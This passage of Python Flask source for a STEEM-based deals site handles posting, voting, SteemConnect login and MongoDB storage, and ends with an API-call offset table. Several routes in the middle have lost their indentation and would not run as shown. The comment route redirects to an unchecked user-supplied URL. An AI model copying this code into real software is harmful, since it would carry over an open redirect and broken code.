                if auth_account[0] == "fomodeals":
                    session['authorized'] = True
        app.logger.info('Confirmed token and auth of {} successful'.format(session['username']))
        return True
    else:
        session['logged_in'] = False
        return False
def post_to_steem(deal, update=False):
    """Sanitize a deal form dict and publish it as a STEEM post.

    When ``update`` is True an existing post is edited (no comment_options /
    self-vote); otherwise a fresh post is created with a 10% @fomodeals
    beneficiary. Returns True only when the post was actually submitted.
    NOTE(review): the `deal` route below duplicates most of this logic.
    """
    comment_options = {
        'max_accepted_payout': '1000000.000 SBD',
        'percent_steem_dollars': 10000,
        'allow_votes': True,
        'allow_curation_rewards': True,
        'extensions': [[0, {
            'beneficiaries': [
                {'account': 'fomodeals', 'weight': 1000}
            ]}
        ]]
    }
    permlink = ""
    deal_post_data = {}
    # populate sanitised deal data
    deal_post_data['title'] = deal['title'].strip()
    deal_post_data['url'] = deal['url']
    deal_post_data['brand_code'] = slugify(deal['brand'])
    deal_post_data['description'] = deal['description']
    try:
        # HTML checkboxes arrive as 'on' when ticked, absent otherwise.
        deal_post_data['freebie'] = True if deal['freebie'] == 'on' else False
    except KeyError:
        deal_post_data['freebie'] = False
    # TODO: validate image?
    if 'image_url' not in deal or deal['image_url'] == "":
        # Fall back to the site logo when no image was supplied.
        deal_post_data['image_url'] = 'https://fomodeals.org/assets/images/logo_round.png'
    else:
        deal_post_data['image_url'] = deal['image_url']
    if 'global' in deal and deal['global'] == 'on':
        deal_post_data['global'] = True
    else:
        deal_post_data['global'] = False
    deal_post_data['country_code'] = deal['country_code']
    if not 'coupon_code' in deal or deal['coupon_code'].strip() == "":
        deal_post_data['coupon_code'] = False
    else:
        deal_post_data['coupon_code'] = deal['coupon_code'].strip()
    try:
        deal_post_data['date_start'] = parser.parse(deal['deal_start']).isoformat()
    except ValueError:
        # Unparseable start date: default to today.
        deal_post_data['date_start'] = date.today().isoformat()
    try:
        deal_post_data['date_end'] = parser.parse(deal['deal_end']).isoformat()
    except ValueError:
        # Unparseable end date: default to 45 days after the start date.
        deal_post_data['date_end'] = (parser.parse(deal_post_data['date_start']) + timedelta(days=45)).isoformat()
    json_metadata = {
        'community': 'fomodeals',
        'app': 'fomodeals/1.0.0',
        'format': 'markdown',
        'tags': [ 'fomodeals' ],
        'image': [ "https://steemitimages.com/0x0/" + deal_post_data['image_url'] ],
        'deal': deal_post_data
    }
    # Tag by country unless the deal is marked global.
    if 'country_code' in deal_post_data and not deal_post_data['global']:
        json_metadata['tags'].append('fomodeals-'+deal['country_code'])
    else:
        json_metadata['tags'].append('fomodeals-global')
    app.logger.info("deal_post_data: {}".format(deal_post_data))
    # Render the markdown post body from a template.
    body = render_template("deal_post.md", deal=deal_post_data)
    try:
        # POST_TO_STEEM acts as a dry-run switch for development.
        if 'POST_TO_STEEM' in app.config and app.config['POST_TO_STEEM'] == "1":
            s = Steem(nodes=['https://rpc.buildteam.io', 'https://api.steemit.com', 'https://steemd.steemitstage.com'],
                keys=[app.config['POSTING_KEY'], app.config['ACTIVE_KEY']])
            if update:
                p = s.commit.post(title=deal['title'],
                            body=body,
                            author=session['username'],
                            json_metadata=json_metadata)
            else:
                p = s.commit.post(title=deal['title'],
                            body=body,
                            author=session['username'],
                            json_metadata=json_metadata,
                            comment_options=comment_options,
                            self_vote=True)
            permlink = p['operations'][0][1]['permlink']
            app.logger.info("Posted to STEEM with id={}".format(permlink))
            return True
        else:
            app.logger.info("Skipped posting to steem:\n\n{}".format(body))
            return False
    except Exception as e:
        app.logger.info(e)
        traceback.print_exc(file=sys.stdout)
        return False
@app.template_filter('humanize')
def _jinja2_filter_humanize(t):
    """Render a date/time string as a relative phrase, e.g. '2 days ago'."""
    return arrow.get(parser.parse(t)).humanize()
@app.template_filter('reputation')
def _jinja2_filter_reputation(rep):
    """Convert a raw STEEM reputation value to the familiar ~25-75 scale.

    Fix: math.log10(abs(rep) - 10) raises ValueError (math domain error)
    whenever abs(rep) <= 10 — e.g. a brand-new account with raw reputation 0
    would crash page rendering. Such tiny raw values now map to the
    baseline score of 25.
    """
    rep = int(rep)
    if abs(rep) <= 10:
        return 25
    calc = (math.log10(abs(rep) - 10) - 9)
    # Negative raw reputation mirrors around the baseline.
    if rep < 0:
        calc = -calc
    return int(calc * 9 + 25)
@app.template_filter('expired')
def _jinja2_filter_expired(date):
    """True when the given date string is past its end-of-day cutoff."""
    # Compare against 23:59 of the deal's last day, in naive local time.
    cutoff = parser.parse(date).replace(hour=23, minute=59, tzinfo=None)
    remaining = (cutoff - datetime.today()).total_seconds()
    return remaining < 0
@app.template_filter('expires_class')
def _jinja2_filter_expires_class(date, fmt=None):
    """CSS class for an expiry badge: urgent red within two days, grey otherwise."""
    cutoff = parser.parse(date).replace(hour=23, minute=59, tzinfo=None)
    days_left = (cutoff - datetime.today()).days
    return "red pulse" if days_left <= 2 else "grey lighten-1"
@app.template_filter('expires_time')
def _jinja2_filter_expires_time(date, fmt=None):
    """Human phrase for an expiry date: 'now', 'soon', 'in N days', or 'N days ago'."""
    cutoff = parser.parse(date).replace(hour=23, minute=59, tzinfo=None)
    now = datetime.today()
    days = (cutoff - now).days
    seconds_left = (cutoff - now).total_seconds()
    if seconds_left < 0:
        n = abs(days)
        return f"{n} day{'' if n == 1 else 's'} ago"
    if seconds_left < 86400:
        return "now"
    if seconds_left < 172800:
        return "soon"
    return f"in {days} day{'' if days == 1 else 's'}"
@app.template_filter('datetimeformat')
def _jinja2_filter_datetime(date, fmt=None):
    """Format a date string as e.g. 'Jan 02, 2020' (timezone info dropped)."""
    naive = parser.parse(date).replace(tzinfo=None)
    return naive.strftime('%b %d, %Y')
@app.route("/fomodeals/@<author>/<permlink>")
def read_deal(author, permlink):
try:
r = requests.get(
'https://api.steemjs.com/getState?path=/fomodeals/@{}/{}'.format(author, permlink))
if r.status_code == 200:
all_content = r.json()['content']
content = all_content['{}/{}'.format(author, permlink)]
json_metadata = json.loads(content['json_metadata'])
deal_metadata = json_metadata['deal']
payout = float(content['pending_payout_value'].split(" ")[0])
return render_template('details.html', author=author, permlink=permlink, json_metadata=json_metadata, deal=deal_metadata, content=all_content, payout="{0:.2f}".format(payout))
else:
return render_template('404.html'), 404
except Exception as e:
app.logger.info(e)
return redirect('https://steemit.com/fomodeals/@{}/{}'.format(author, permlink))
@app.route("/vote/<author>/<permlink>/<kind>")
def vote(author, permlink, kind):
if 'logged_in' in session and session['logged_in'] and 'authorized' in session and session['authorized'] and 'username' in session:
try:
weight=100
if kind == "flag":
weight=-100
identifier = "@" + author + "/" + permlink
if 'POST_TO_STEEM' in app.config and app.config['POST_TO_STEEM'] == "1":
s = Steem(nodes=['https://rpc.buildteam.io', 'https://api.steemit.com', 'https://steemd.steemitstage.com'],
keys=[app.config['POSTING_KEY'], app.config['ACTIVE_KEY']])
p = s.commit.vote(identifier, weight, account=session['username'])
app.logger.info(p)
return jsonify({ 'status': True })
except Exception as e:
app.logger.info(e)
return jsonify({ 'status': False, 'msg': 'unknown exception' })
else:
return jsonify({ 'status': False, 'msg': 'please login and authorize first' })
@app.route("/whoami")
def whoami():
if 'username' in session:
return jsonify({ 'username': session['username']})
else:
return jsonify({ 'username': "" });
@app.route("/update/<permlink>", methods=['GET', 'POST'])
def update(permlink):
if 'logged_in' in session and session['logged_in'] and 'username' in session and session['username'] in app.config['ADMINS'].split(','):
if request.method == 'POST':
deal_update=request.form.to_dict()
# fix some values
if deal_update['warning'].strip() != "":
deal_update['available'] = False
else:
deal_update['available'] = True
if not 'freebie' in deal_update:
deal_update['freebie'] = ''
if not 'global' in deal_update:
deal_update['global'] = ''
if not 'hide' in deal_update:
deal_update['hide'] = False;
else:
deal_update['hide'] = True;
try:
deal_update['deal_start'] = parser.parse(deal_update['deal_start']).isoformat()
except ValueError:
deal_update['deal_start'] = date.today().isoformat()
try:
deal_update['deal_end'] = parser.parse(deal_update['deal_end']).isoformat()
except ValueError:
deal_update['deal_end'] = (date.today() + timedelta(days=45)).isoformat()
deal_update['deal_expires'] = deal_update['deal_end']
deal_update['brand_code'] = slugify(deal_update['brand'])
# TODO: needs more testing on testnet...
# p = post_to_steem(deal_update, update=True)
# app.logger.info("STEEM updated? {}".format(p))
app.logger.info("updating {}: {}".format(permlink, deal_update))
try:
db.deal.update_one({ 'permlink': permlink },
{ '$set': deal_update }, upsert=False)
except Exception as e:
flash(u'Sorry but there was an error trying to update your deal: ' + textwrap.shorten(str(e), width=80, placeholder="..."), 'error')
return redirect(url_for('index'))
else:
deal = db.deal.find_one({'permlink': permlink })
app.logger.info("requested update of: {}".format(deal))
return render_template('update.html', deal=deal)
else:
app.logger.info("non-authorised update attempt ({}, {})".format(permlink, session['username'] if 'username' in session else 'anon'))
return render_template('login_failed.html'), 401
@app.route("/")
def index():
# TODO: only show non-expired deals... paginate?
deals = []
deal_cursor = db.deal.find({'deal_expires': { '$gte': date.today().isoformat()}, 'hide': { '$ne': True}}).sort([('_id', -1)])
for deal in deal_cursor:
deals.append(deal)
if 'username' in session:
if 'logged_in' in session:
app.logger.info("{} logged_in: {}, authorized: {}".format(session['username'], session['logged_in'], session['authorized']))
else:
app.logger.info("{} logged_in: {}".format(session['username'], False))
else:
app.logger.info("anonymous user")
return render_template('index.html', deals=deals, session=session, admins=admins)
@app.route("/trending")
def trending():
return render_template('trending.html')
@app.route("/created")
def created():
return render_template('created.html')
@app.route("/hot")
def hot():
return render_template('hot.html')
@app.route("/countries")
def countries_json():
countries = db.deal.find({ 'country_code': { '$ne': '' }}).distinct('country_code')
return jsonify(sorted(countries, reverse=True))
@app.route("/country/<country>")
def countries(country):
deals = []
deal_cursor=db.deal.find({'deal_expires': { '$gte': date.today().isoformat()}, 'country_code': country, 'hide': { '$ne': True}}).sort([('_id', -1)])
for deal in deal_cursor:
deals.append(deal)
return render_template('index.html', deals=deals, country=country, session=session, admins=admins)
@app.route("/freebies")
def freebies():
deals = []
deal_cursor=db.deal.find({'deal_expires': { '$gte': date.today().isoformat()}, 'freebie': 'on', 'hide': { '$ne': True}}).sort([('_id', -1)])
for deal in deal_cursor:
deals.append(deal)
return render_template('index.html', deals=deals, session=session, admins=admins)
@app.route("/brand/<brand>")
def brands(brand):
deals = []
deal_cursor=db.deal.find({'deal_expires': { '$gte': date.today().isoformat()}, 'brand_code': brand, 'hide': { '$ne': True}}).sort([('_id', -1)])
for deal in deal_cursor:
deals.append(deal)
return render_template('index.html', deals=deals, session=session, admins=admins)
@app.errorhandler(404)
def page_not_found(e):
    """Serve the custom 404 page with the matching status code."""
    body = render_template('404.html')
    return body, 404
@app.route('/logout', methods=['GET'])
def logout():
    """Drop all STEEM credentials from the session and return to the front page."""
    for key in ('username', 'token', 'authorized'):
        session.pop(key, None)
    session['logged_in'] = False
    return redirect(url_for('index'))
@app.route('/auth', methods=['GET'])
def authorized():
    """Re-check the session token against SteemConnect and refresh 'authorized'.

    Authorization means: the account is @fomodeals itself, or has granted
    @fomodeals posting authority. Any failure logs the user out with a 401.
    """
    if not 'logged_in' in session or not session['logged_in']:
        return render_template('login_failed.html'), 401
    r = requests.get('https://v2.steemconnect.com/api/me', headers={ 'Authorization': session['token'] })
    if r.status_code == 200:
        app.logger.info('Auth of {} successful'.format(session['username']))
        session['authorized'] = False
        if r.json()['_id'] != session['username']:
            # Token belongs to another account; force a re-login.
            session['logged_in'] = False
            return render_template('login_failed.html'), 401
        if session['username'] == "fomodeals":
            session['authorized'] = True
        if 'account_auths' in r.json()['account']['posting']:
            # Posting authority delegated to @fomodeals also counts.
            for auth_account in r.json()['account']['posting']['account_auths']:
                if auth_account[0] == "fomodeals":
                    session['authorized'] = True
        return redirect(url_for('index'))
    else:
        session['logged_in'] = False
        return render_template('login_failed.html'), 401
@app.route('/complete/sc/', methods=['GET'])
def complete_sc():
    """SteemConnect OAuth callback: verify the token and establish the session."""
    # TODO: verify token
    token = request.args.get('access_token')
    expire = request.args.get('expires_in')
    username = request.args.get('username')
    # Confirm the token is valid and learn which account it belongs to.
    r = requests.get('https://v2.steemconnect.com/api/me', headers={ 'Authorization': token })
    if r.status_code == 200:
        app.logger.info('Login of {} successful'.format(username))
        session['authorized'] = False
        # Logged in only if the callback's username matches the token's account.
        session['logged_in'] = username == r.json()['_id']
        if username == "fomodeals":
            session['authorized'] = True
        elif 'account_auths' in r.json()['account']['posting']:
            # Authorized if posting authority was delegated to @fomodeals.
            for auth_account in r.json()['account']['posting']['account_auths']:
                if auth_account[0] == "fomodeals":
                    session['authorized'] = True
        session['username'] = username
        session['token'] = token
        return redirect(url_for('index'))
    else:
        session['logged_in'] = False
        return render_template('login_failed.html'), 401
@app.route('/comment/<parent_author>/<parent_permlink>', methods=['POST'])
def post_comment(parent_author, parent_permlink):
    """Post a comment reply to a STEEM post on behalf of the session user."""
    if not confirm_user():
        return render_template('login_failed.html'), 401
    comment_form=request.form.to_dict()
    # 10% beneficiary cut to @fomodeals on comment rewards.
    comment_options = {
        'max_accepted_payout': '1000000.000 SBD',
        'percent_steem_dollars': 10000,
        'allow_votes': True,
        'allow_curation_rewards': True,
        'extensions': [[0, {
            'beneficiaries': [
                {'account': 'fomodeals', 'weight': 1000}
            ]}
        ]]
    }
    json_metadata = {
        'community': 'fomodeals',
        'app': 'fomodeals/1.0.0',
        'format': 'markdown'
    }
    try:
        # POST_TO_STEEM acts as a dry-run switch for development.
        if 'POST_TO_STEEM' in app.config and app.config['POST_TO_STEEM'] == "1":
            s = Steem(nodes=['https://rpc.buildteam.io', 'https://api.steemit.com', 'https://steemd.steemitstage.com'],
                keys=[app.config['POSTING_KEY'], app.config['ACTIVE_KEY']])
            p = s.commit.post(body=comment_form['body'],
                        title="",
                        author=session['username'],
                        json_metadata=json_metadata,
                        reply_identifier="@{}/{}".format(parent_author, parent_permlink),
                        comment_options=comment_options)
            permlink = p['operations'][0][1]['permlink']
            app.logger.info("Posted to STEEM with id={}".format(permlink))
        else:
            app.logger.info("Skipped posting to steem:\n\n{}".format(comment_form['body']))
            permlink = "testing-{}".format(int(time.time()))
    except Exception as e:
        app.logger.info(e)
        traceback.print_exc(file=sys.stdout)
        flash(u'Sorry but there was an error trying to post your comment: ' + textwrap.shorten(str(e), width=80, placeholder="..."), 'error')
        return redirect(url_for("index"))
    # Return to the page the comment form was on, when provided.
    if 'return_to' in comment_form:
        return redirect(comment_form['return_to'], code=302)
    else:
        return redirect(url_for("index"), code=302)
@app.route('/deal', methods=['POST'])
def deal():
    """Handle the deal-submission form: post to STEEM, then persist to MongoDB.

    NOTE(review): this largely duplicates post_to_steem() above; keep the two
    in sync when changing sanitization rules.
    """
    if not confirm_user():
        return render_template('login_failed.html'), 401
    deal_form=request.form.to_dict()
    # 10% beneficiary cut to @fomodeals on post rewards.
    comment_options = {
        'max_accepted_payout': '1000000.000 SBD',
        'percent_steem_dollars': 10000,
        'allow_votes': True,
        'allow_curation_rewards': True,
        'extensions': [[0, {
            'beneficiaries': [
                {'account': 'fomodeals', 'weight': 1000}
            ]}
        ]]
    }
    permlink = ""
    deal_post_data = {}
    # populate sanitised deal data
    deal_post_data['title'] = deal_form['title'].strip()
    deal_post_data['url'] = deal_form['url']
    if deal_form['brand'].strip() != "":
        deal_post_data['brand_code'] = slugify(deal_form['brand'].strip())
    deal_post_data['description'] = deal_form['description']
    try:
        # HTML checkboxes arrive as 'on' when ticked, absent otherwise.
        deal_post_data['freebie'] = True if deal_form['freebie'] == 'on' else False
    except KeyError:
        deal_post_data['freebie'] = False
    if 'image_url' not in deal_form or deal_form['image_url'] == "":
        # Fall back to the site logo when no image was supplied.
        deal_post_data['image_url'] = 'https://fomodeals.org/assets/images/logo_round.png'
    else:
        deal_post_data['image_url'] = deal_form['image_url']
    if 'global' in deal_form and deal_form['global'] == 'on':
        deal_post_data['global'] = True
    else:
        deal_post_data['global'] = False
    deal_post_data['country_code'] = deal_form['country_code']
    if not 'coupon_code' in deal_form or deal_form['coupon_code'].strip() == "":
        deal_post_data['coupon_code'] = False
    else:
        deal_post_data['coupon_code'] = deal_form['coupon_code'].strip()
    try:
        deal_post_data['date_start'] = parser.parse(deal_form['deal_start']).isoformat()
    except ValueError:
        # Unparseable start date: default to today.
        deal_post_data['date_start'] = date.today().isoformat()
    try:
        deal_post_data['date_end'] = parser.parse(deal_form['deal_end']).isoformat()
    except ValueError:
        # Unparseable end date: default to 45 days after the start date.
        deal_post_data['date_end'] = (parser.parse(deal_post_data['date_start']) + timedelta(days=45)).isoformat()
    json_metadata = {
        'community': 'fomodeals',
        'app': 'fomodeals/1.0.0',
        'format': 'markdown',
        'tags': [ 'fomodeals' ],
        'image': [ "https://steemitimages.com/0x0/" + deal_post_data['image_url'] ],
        'deal': deal_post_data
    }
    # Tag by country unless the deal is marked global; also tag the brand.
    if 'country_code' in deal_post_data and not deal_post_data['global']:
        json_metadata['tags'].append('fomodeals-'+deal_form['country_code'])
    else:
        json_metadata['tags'].append('fomodeals-global')
    if 'brand_code' in deal_post_data and deal_post_data['brand_code'] != "":
        json_metadata['tags'].append(deal_post_data['brand_code'])
    app.logger.info("deal_post_data: {}".format(deal_post_data))
    # Render the markdown post body from a template.
    body = render_template("deal_post.md", deal=deal_post_data)
    try:
        # POST_TO_STEEM acts as a dry-run switch for development.
        if 'POST_TO_STEEM' in app.config and app.config['POST_TO_STEEM'] == "1":
            s = Steem(nodes=['https://rpc.buildteam.io', 'https://api.steemit.com', 'https://steemd.steemitstage.com'],
                keys=[app.config['POSTING_KEY'], app.config['ACTIVE_KEY']])
            p = s.commit.post(title=deal_form['title'],
                    body=body,
                    author=session['username'],
                    json_metadata=json_metadata,
                    comment_options=comment_options,
                    self_vote=True)
            permlink = p['operations'][0][1]['permlink']
            app.logger.info("Posted to STEEM with id={}".format(permlink))
        else:
            app.logger.info("Skipped posting to steem:\n\n{}".format(body))
            permlink = "testing-{}".format(int(time.time()))
        # Persist the raw form (plus derived fields) to MongoDB.
        deal_form['permlink'] = permlink
        deal_form['steem_user'] = session['username']
        try:
            deal_form['deal_start'] = parser.parse(deal_form['deal_start']).isoformat()
        except ValueError:
            deal_form['deal_start'] = date.today().isoformat()
        try:
            deal_form['deal_end'] = parser.parse(deal_form['deal_end']).isoformat()
        except ValueError:
            deal_form['deal_end'] = (date.today() + timedelta(days=45)).isoformat()
        deal_form['deal_expires'] = deal_form['deal_end']
        deal_form['brand_code'] = slugify(deal_form['brand'])
        mongo_id = db['deal'].insert(deal_form)
        app.logger.info("saved to mongodb: {}\n{}".format(mongo_id, deal_form))
    except Exception as e:
        app.logger.info(e)
        traceback.print_exc(file=sys.stdout)
        flash(u'Sorry but there was an error trying to post your deal: ' + textwrap.shorten(str(e), width=80, placeholder="..."), 'error')
        return redirect(url_for("submit_page"))
    # TODO: make a pretty template but for now go to the post
    if 'POST_TO_STEEM' in app.config and app.config['POST_TO_STEEM'] == "1":
        return redirect("/fomodeals/@{}/{}".format(session['username'], permlink), code=302)
    else:
        return redirect(url_for("index"))
@app.route('/submit')
def submit_page():
    """Show the deal-submission form to logged-in, authorized users only."""
    if session.get('logged_in') and session.get('authorized'):
        return render_template("submit_deals.html")
    return redirect(url_for('index'))
@app.route('/sitemap.xml', methods=['GET'])
def sitemap():
    """Generate sitemap.xml: every argument-less GET route plus all deal pages."""
    pages=[]
    # Static routes get a fixed "recently modified" timestamp.
    ten_days_ago = (date.today() - timedelta(days=10)).isoformat()
    # static pages
    for rule in app.url_map.iter_rules():
        if "GET" in rule.methods and len(rule.arguments)==0:
            pages.append([rule.rule, ten_days_ago])
    # deals
    deal_cursor = db.deal.find({'hide': { '$ne': True}}).sort([('_id', -1)])
    for deal in deal_cursor:
        # Older records without a steem_user field are skipped.
        if 'steem_user' in deal:
            pages.append(["/fomodeals/@{}/{}".format(deal['steem_user'], deal['permlink']), parser.parse(deal['deal_start']).date().isoformat()])
    sitemap_xml = render_template('sitemap.xml', pages=pages)
    return Response(sitemap_xml, mimetype='application/xml')
| [
"flask.render_template",
"flask.request.args.get",
"flask.Flask",
"flask.request.form.to_dict",
"flask.session.pop",
"pymongo.MongoClient",
"datetime.timedelta",
"flask.jsonify",
"flaskext.markdown.Markdown",
"traceback.print_exc",
"dateutil.parser.parse",
"json.loads",
"requests.get",
"fl... | [((384, 443), 'flask.Flask', 'Flask', (['__name__'], {'static_folder': '"""static"""', 'static_url_path': '""""""'}), "(__name__, static_folder='static', static_url_path='')\n", (389, 443), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((574, 587), 'flaskext.markdown.Markdown', 'Markdown', (['app'], {}), '(app)\n', (582, 587), False, 'from flaskext.markdown import Markdown\n'), ((594, 632), 'pymongo.MongoClient', 'MongoClient', (['"""mongodb://mongodb:27017"""'], {}), "('mongodb://mongodb:27017')\n", (605, 632), False, 'from pymongo import MongoClient\n'), ((754, 853), 'requests.get', 'requests.get', (['"""https://v2.steemconnect.com/api/me"""'], {'headers': "{'Authorization': session['token']}"}), "('https://v2.steemconnect.com/api/me', headers={'Authorization':\n session['token']})\n", (766, 853), False, 'import sys, traceback, json, textwrap, requests, pprint, time, math, arrow\n'), ((2111, 2133), 'slugify.slugify', 'slugify', (["deal['brand']"], {}), "(deal['brand'])\n", (2118, 2133), False, 'from slugify import slugify\n'), ((3964, 4016), 'flask.render_template', 'render_template', (['"""deal_post.md"""'], {'deal': 'deal_post_data'}), "('deal_post.md', deal=deal_post_data)\n", (3979, 4016), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((5714, 5732), 'dateutil.parser.parse', 'parser.parse', (['date'], {}), '(date)\n', (5726, 5732), False, 'from dateutil import parser\n'), ((5746, 5791), 'datetime.date.replace', 'date.replace', ([], {'hour': '(23)', 'minute': '(59)', 'tzinfo': 'None'}), '(hour=23, minute=59, tzinfo=None)\n', (5758, 5791), False, 'from datetime import date, timedelta, datetime\n'), ((6005, 6023), 'dateutil.parser.parse', 'parser.parse', (['date'], {}), '(date)\n', (6017, 6023), False, 'from dateutil import parser\n'), ((6037, 6082), 'datetime.date.replace', 'date.replace', ([], {'hour': '(23)', 
'minute': '(59)', 'tzinfo': 'None'}), '(hour=23, minute=59, tzinfo=None)\n', (6049, 6082), False, 'from datetime import date, timedelta, datetime\n'), ((6306, 6324), 'dateutil.parser.parse', 'parser.parse', (['date'], {}), '(date)\n', (6318, 6324), False, 'from dateutil import parser\n'), ((6338, 6383), 'datetime.date.replace', 'date.replace', ([], {'hour': '(23)', 'minute': '(59)', 'tzinfo': 'None'}), '(hour=23, minute=59, tzinfo=None)\n', (6350, 6383), False, 'from datetime import date, timedelta, datetime\n'), ((6823, 6841), 'dateutil.parser.parse', 'parser.parse', (['date'], {}), '(date)\n', (6835, 6841), False, 'from dateutil import parser\n'), ((6855, 6880), 'datetime.date.replace', 'date.replace', ([], {'tzinfo': 'None'}), '(tzinfo=None)\n', (6867, 6880), False, 'from datetime import date, timedelta, datetime\n'), ((12225, 12299), 'flask.render_template', 'render_template', (['"""index.html"""'], {'deals': 'deals', 'session': 'session', 'admins': 'admins'}), "('index.html', deals=deals, session=session, admins=admins)\n", (12240, 12299), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((12352, 12384), 'flask.render_template', 'render_template', (['"""trending.html"""'], {}), "('trending.html')\n", (12367, 12384), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((12435, 12466), 'flask.render_template', 'render_template', (['"""created.html"""'], {}), "('created.html')\n", (12450, 12466), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((12509, 12536), 'flask.render_template', 'render_template', (['"""hot.html"""'], {}), "('hot.html')\n", (12524, 12536), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((13018, 13113), 'flask.render_template', 'render_template', (['"""index.html"""'], 
{'deals': 'deals', 'country': 'country', 'session': 'session', 'admins': 'admins'}), "('index.html', deals=deals, country=country, session=session,\n admins=admins)\n", (13033, 13113), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((13378, 13452), 'flask.render_template', 'render_template', (['"""index.html"""'], {'deals': 'deals', 'session': 'session', 'admins': 'admins'}), "('index.html', deals=deals, session=session, admins=admins)\n", (13393, 13452), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((13733, 13807), 'flask.render_template', 'render_template', (['"""index.html"""'], {'deals': 'deals', 'session': 'session', 'admins': 'admins'}), "('index.html', deals=deals, session=session, admins=admins)\n", (13748, 13807), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((13957, 13986), 'flask.session.pop', 'session.pop', (['"""username"""', 'None'], {}), "('username', None)\n", (13968, 13986), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((13991, 14017), 'flask.session.pop', 'session.pop', (['"""token"""', 'None'], {}), "('token', None)\n", (14002, 14017), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((14022, 14053), 'flask.session.pop', 'session.pop', (['"""authorized"""', 'None'], {}), "('authorized', None)\n", (14033, 14053), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((14310, 14409), 'requests.get', 'requests.get', (['"""https://v2.steemconnect.com/api/me"""'], {'headers': "{'Authorization': session['token']}"}), "('https://v2.steemconnect.com/api/me', headers={'Authorization':\n session['token']})\n", (14322, 14409), False, 'import sys, 
traceback, json, textwrap, requests, pprint, time, math, arrow\n'), ((15284, 15316), 'flask.request.args.get', 'request.args.get', (['"""access_token"""'], {}), "('access_token')\n", (15300, 15316), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((15330, 15360), 'flask.request.args.get', 'request.args.get', (['"""expires_in"""'], {}), "('expires_in')\n", (15346, 15360), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((15376, 15404), 'flask.request.args.get', 'request.args.get', (['"""username"""'], {}), "('username')\n", (15392, 15404), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((15413, 15501), 'requests.get', 'requests.get', (['"""https://v2.steemconnect.com/api/me"""'], {'headers': "{'Authorization': token}"}), "('https://v2.steemconnect.com/api/me', headers={'Authorization':\n token})\n", (15425, 15501), False, 'import sys, traceback, json, textwrap, requests, pprint, time, math, arrow\n'), ((16461, 16483), 'flask.request.form.to_dict', 'request.form.to_dict', ([], {}), '()\n', (16481, 16483), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((18502, 18524), 'flask.request.form.to_dict', 'request.form.to_dict', ([], {}), '()\n', (18522, 18524), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((21173, 21225), 'flask.render_template', 'render_template', (['"""deal_post.md"""'], {'deal': 'deal_post_data'}), "('deal_post.md', deal=deal_post_data)\n", (21188, 21225), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((24314, 24357), 'flask.render_template', 'render_template', (['"""sitemap.xml"""'], {'pages': 'pages'}), "('sitemap.xml', pages=pages)\n", 
(24329, 24357), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((24369, 24418), 'flask.Response', 'Response', (['sitemap_xml'], {'mimetype': '"""application/xml"""'}), "(sitemap_xml, mimetype='application/xml')\n", (24377, 24418), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((5394, 5409), 'dateutil.parser.parse', 'parser.parse', (['t'], {}), '(t)\n', (5406, 5409), False, 'from dateutil import parser\n'), ((8872, 8941), 'flask.jsonify', 'jsonify', (["{'status': False, 'msg': 'please login and authorize first'}"], {}), "({'status': False, 'msg': 'please login and authorize first'})\n", (8879, 8941), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((9026, 9068), 'flask.jsonify', 'jsonify', (["{'username': session['username']}"], {}), "({'username': session['username']})\n", (9033, 9068), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((9095, 9120), 'flask.jsonify', 'jsonify', (["{'username': ''}"], {}), "({'username': ''})\n", (9102, 9120), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((13866, 13893), 'flask.render_template', 'render_template', (['"""404.html"""'], {}), "('404.html')\n", (13881, 13893), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((14107, 14123), 'flask.url_for', 'url_for', (['"""index"""'], {}), "('index')\n", (14114, 14123), False, 'from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response\n'), ((18244, 18289), 'flask.redirect', 'redirect', (["comment_form['return_to']"], {'code': '(302)'}), "(comment_form['return_to'], code=302)\n", (18252, 18289), False, 'from flask import Flask, 
